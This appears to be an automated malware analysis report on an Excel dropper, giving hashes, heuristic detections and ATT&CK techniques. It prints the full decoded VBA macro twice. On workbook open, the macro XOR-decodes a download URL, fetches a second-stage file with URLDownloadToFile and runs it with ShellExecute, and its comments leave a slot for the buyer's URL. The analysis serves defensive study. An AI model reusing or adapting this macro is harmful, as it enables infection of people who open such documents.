Xls.Dropper.Agent-7623197-0 Office (OLE) malware analysis — malicious · 8be51b3f3be3eb45

MALICIOUS

Office (OLE)

205.0 KB Created: 2014-05-06 06:56:25 Authoring application: Microsoft Excel First seen: 2015-09-16

MD5: 442e22b587e1daa9947e5479c14ac3f0 SHA-1: 6cb08c6eef2c7c7ccf5b8cc972add1c5833b3847 SHA-256: 8be51b3f3be3eb45d2cff9715a2d40fc04c11f25734ea8e7a3f551bcd2c216c8

268 Risk Score

Malware Insights

Xls.Dropper.Agent-7623197-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros that leverage the Workbook_Open event. It uses a lure to trick users into enabling macros, which then calls URLDownloadToFile to download a second-stage payload. The ClamAV signature 'Xls.Dropper.Agent-7623197-0' further confirms its malicious nature as a dropper.

Heuristics 7

ClamAV: Xls.Dropper.Agent-7623197-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7623197-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
Matched line in script
```
"URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4687 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4687 bytes
SHA-256: `cb473a12779171032cbf35f9389d605d54dd5567e67418e86f116160ed6dfa6c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True ' Welcome to my Macro Doc Program ' Thanks for Purchasing My Service ' I am not responsible for Your Any Action ' Please Use it at your Own Fucking Risk. ' Mahalam, Namaste ' Shellshock, BioShock ' WhattheFuck, IRock ' Bye Bye #If VBA7 Then Private Declare PtrSafe Function OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv Lib "shell32" Alias _ "ShellExecuteA" (ByVal gjbzOHrZcwYerBW As Long, ByVal kXJlHGiPhSWxW As String, _ ByVal GHGhHbjgYuHbHhvBbBGbGHhJghGh As String, ByVal DDhGhgggGgHhHhHhHhHhHhH As String, ByVal uHE As String, ByVal nAZZBJWySxVnNoztLuQ As Long) As Long Private Declare PtrSafe Function OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _ ByVal XtvEOJnCUpIC As String, ByVal sXhhglV As Long, ByVal OVANMd As Long) As Long #Else Private Declare Function OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv Lib "shell32" Alias _ "ShellExecuteA" (ByVal gjbzOHrZcwYerBW As Long, ByVal kXJlHGiPhSWxW As String, _ ByVal GHGhHbjgYuHbHhvBbBGbGHhJghGh As String, ByVal DDhGhgggGgHhHhHhHhHhHhH As String, ByVal uHE As String, ByVal nAZZBJWySxVnNoztLuQ As Long) As Long Private Declare Function OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _ ByVal XtvEOJnCUpIC As String, ByVal sXhhglV As Long, ByVal OVANMd As Long) As Long #End If Private Sub CCCCvvvvVvvvvvvBBBBBBBBbnnnnn() Dim VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh As String, FFFDDeeeeDDDssdDSWEWEddd As String, KUDDqqRbnOjNmEPEBvNKiRci As String, WEweSDsddSDdddSSDDDddddddDDD As String, LgWMblTTGtUrDRzQCGhU As String, RLebyTsyuGJXtvEOJnCUpICs As String FFFDDeeeeDDDssdDSWEWEddd = Decrypt("fyf/msuDfjcT") KUDDqqRbnOjNmEPEBvNKiRci = "C:\Users\Public\Documents" & "\" & FFFDDeeeeDDDssdDSWEWEddd Dim UrlToDownloadAndExecute As String UrlToDownloadAndExecute = "xxx*672\|on'%p76o!3)oqn().(3oy03 \| toso$..$ &.70..!&payloadAABA" 'Put Your Encrypted URL Here Dim EncKey As String EncKey = FindMyCarKey(UrlToDownloadAndExecute) Dim SlicedURLz As String SlicedURLz = Mid(UrlToDownloadAndExecute, 1, Len(UrlToDownloadAndExecute) - 11) VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh = XorC(SlicedURLz, EncKey) OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF 0, VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh, KUDDqqRbnOjNmEPEBvNKiRci, 0, 0 OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv 0, "open", KUDDqqRbnOjNmEPEBvNKiRci, "", vbNullString, vbNormalFocus End Sub Private Sub Workbook_Open() CCCCvvvvVvvvvvvBBBBBBBBbnnnnn End Sub Private Function Decrypt(enc) Dim x, i, tmp enc = StrReverse(enc) For i = 1 To Len(enc) x = Mid(enc, i, 1) tmp = tmp & Chr(Asc(x) - 1) Next Decrypt = tmp End Function Function XorC(ByVal sData As String, ByVal sKey As String) As String Dim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As Byte Dim bEncOrDec As Boolean 'confirm valid string and key input: If Len(sData) = 0 Or Len(sKey) = 0 Then XorC = "Invalid argument(s) used": Exit Function 'check whether running encryption or decryption (flagged by presence of "xxx" at start of sData): If Left$(sData, 3) = "xxx" Then bEncOrDec = False 'decryption sData = Mid$(sData, 4) Else bEncOrDec = True 'encryption End If 'assign strings to byte arrays (unicode) byIn = sData byOut = sData byKey = sKey l = LBound(byKey) For i = LBound(byIn) To UBound(byIn) - 1 Step 2 byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec 'avoid Chr$(0) by using bEncOrDec flag l = l + 2 If l > UBound(byKey) Then l = LBound(byKey) 'ensure stay within bounds of Key Next i XorC = byOut If bEncOrDec Then XorC = "xxx" & XorC 'add "xxx" onto encrypted text End Function Function FindMyCarKey(ByVal MyMangaledCodes As String) Dim PlayMaker As String PlayMaker = Right(MyMangaledCodes, 4) FindMyCarKey = PlayMaker End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: cb473a12779171032cbf35f9389d605d54dd5567e67418e86f116160ed6dfa6c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Welcome to my Macro Doc Program
' Thanks for Purchasing My Service
' I am not responsible for Your Any Action
' Please Use it at your Own Fucking Risk.
' Mahalam, Namaste
' Shellshock, BioShock
' WhattheFuck, IRock
' Bye Bye
#If VBA7 Then
Private Declare PtrSafe Function OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv Lib "shell32" Alias _
"ShellExecuteA" (ByVal gjbzOHrZcwYerBW As Long, ByVal kXJlHGiPhSWxW As String, _
ByVal GHGhHbjgYuHbHhvBbBGbGHhJghGh As String, ByVal DDhGhgggGgHhHhHhHhHhHhH As String, ByVal uHE As String, ByVal nAZZBJWySxVnNoztLuQ As Long) As Long
Private Declare PtrSafe Function OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _
ByVal XtvEOJnCUpIC As String, ByVal sXhhglV As Long, ByVal OVANMd As Long) As Long
#Else
Private Declare Function OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv Lib "shell32" Alias _
"ShellExecuteA" (ByVal gjbzOHrZcwYerBW As Long, ByVal kXJlHGiPhSWxW As String, _
ByVal GHGhHbjgYuHbHhvBbBGbGHhJghGh As String, ByVal DDhGhgggGgHhHhHhHhHhHhH As String, ByVal uHE As String, ByVal nAZZBJWySxVnNoztLuQ As Long) As Long
Private Declare Function OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _
ByVal XtvEOJnCUpIC As String, ByVal sXhhglV As Long, ByVal OVANMd As Long) As Long
#End If

Private Sub CCCCvvvvVvvvvvvBBBBBBBBbnnnnn()
Dim VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh As String, FFFDDeeeeDDDssdDSWEWEddd As String, KUDDqqRbnOjNmEPEBvNKiRci As String, WEweSDsddSDdddSSDDDddddddDDD As String, LgWMblTTGtUrDRzQCGhU As String, RLebyTsyuGJXtvEOJnCUpICs As String
FFFDDeeeeDDDssdDSWEWEddd = Decrypt("fyf/msuDfjcT")
KUDDqqRbnOjNmEPEBvNKiRci = "C:\Users\Public\Documents" & "\" & FFFDDeeeeDDDssdDSWEWEddd
Dim UrlToDownloadAndExecute As String
UrlToDownloadAndExecute = "xxx*672|on'%p76o!3)oqn().(3oy03  | toso$..$ &.70..!&payloadAABA" 'Put Your Encrypted URL Here
Dim EncKey As String
EncKey = FindMyCarKey(UrlToDownloadAndExecute)
Dim SlicedURLz As String
SlicedURLz = Mid(UrlToDownloadAndExecute, 1, Len(UrlToDownloadAndExecute) - 11)
VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh = XorC(SlicedURLz, EncKey)
OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF 0, VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh, KUDDqqRbnOjNmEPEBvNKiRci, 0, 0
OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv 0, "open", KUDDqqRbnOjNmEPEBvNKiRci, "", vbNullString, vbNormalFocus
End Sub

Private Sub Workbook_Open()
CCCCvvvvVvvvvvvBBBBBBBBbnnnnn
End Sub
Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function
Function XorC(ByVal sData As String, ByVal sKey As String) As String
    Dim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As Byte
    Dim bEncOrDec As Boolean
     'confirm valid string and key input:
    If Len(sData) = 0 Or Len(sKey) = 0 Then XorC = "Invalid argument(s) used": Exit Function
     'check whether running encryption or decryption (flagged by presence of "xxx" at start of sData):
    If Left$(sData, 3) = "xxx" Then
        bEncOrDec = False 'decryption
        sData = Mid$(sData, 4)
    Else
        bEncOrDec = True 'encryption
    End If
     'assign strings to byte arrays (unicode)
    byIn = sData
    byOut = sData
    byKey = sKey
    l = LBound(byKey)
    For i = LBound(byIn) To UBound(byIn) - 1 Step 2
        byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec 'avoid Chr$(0) by using bEncOrDec flag
        l = l + 2
        If l > UBound(byKey) Then l = LBound(byKey) 'ensure stay within bounds of Key
    Next i
    XorC = byOut
    If bEncOrDec Then XorC = "xxx" & XorC 'add "xxx" onto encrypted text
End Function
Function FindMyCarKey(ByVal MyMangaledCodes As String)
Dim PlayMaker As String
PlayMaker = Right(MyMangaledCodes, 4)
FindMyCarKey = PlayMaker
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.